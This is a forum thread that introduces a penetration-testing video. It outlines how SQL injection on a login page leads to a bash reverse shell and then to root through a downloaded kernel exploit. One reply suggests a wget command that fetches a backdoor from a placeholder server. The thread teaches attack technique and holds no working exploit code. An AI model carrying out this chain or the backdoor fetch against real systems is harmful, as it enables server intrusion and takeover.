In this session, we will be having a look at gaining root privileges using command execution

Basically, we'll be seeing how a "simple" SQL Injection can lead to an attacker completely compromising your server

[flash=600,500]
https://www.youtube.com/watch?v=2_tfyF_7KWk[/flash]

Steps

* Discover network for hosts (Netdiscover)
* Scan target network (Nmap)
* Bypass login screen (MySQL Injection)
* Set NetCat to listen on attack machine
* Inject bash reverse shell.
* Navigate to directory where apache user can write files (cd /tmp)
* Search for Local privilege escalation exploit for linux kernel version 2.6
* Download exploit code and host it on attack machine
* Use reverse shell to wget exploit code to Victim’s machine
* Compile exploit code and Execute.
* Game Over


Blog Post here: http://rotimiakinyele.com/posts/rooting-a-box-local-command-execution.jsp

thats very rear in the real world, pass in user submitted parameters directly to the shell?
you could just "wget http://someserver.com/backdoor.php" on very first login.

and save yourself some stress
nice tut.

webdezzi: thats very rear in the real world, pass in user submitted parameters directly to the shell?
you could just "wget http://someserver.com/backdoor.php" on very first login.

and save yourself some stress
nice tut.

You'd be surprised that Local command execution still exists in the real world. .Recently, this vuln was discovered in Boxee (a cross-platform freeware Home Theater PC software application). .You can watch the exploitation vid here
https://www.youtube.com/watch?v=-_wZiFmrwsw


Thanks for dropping by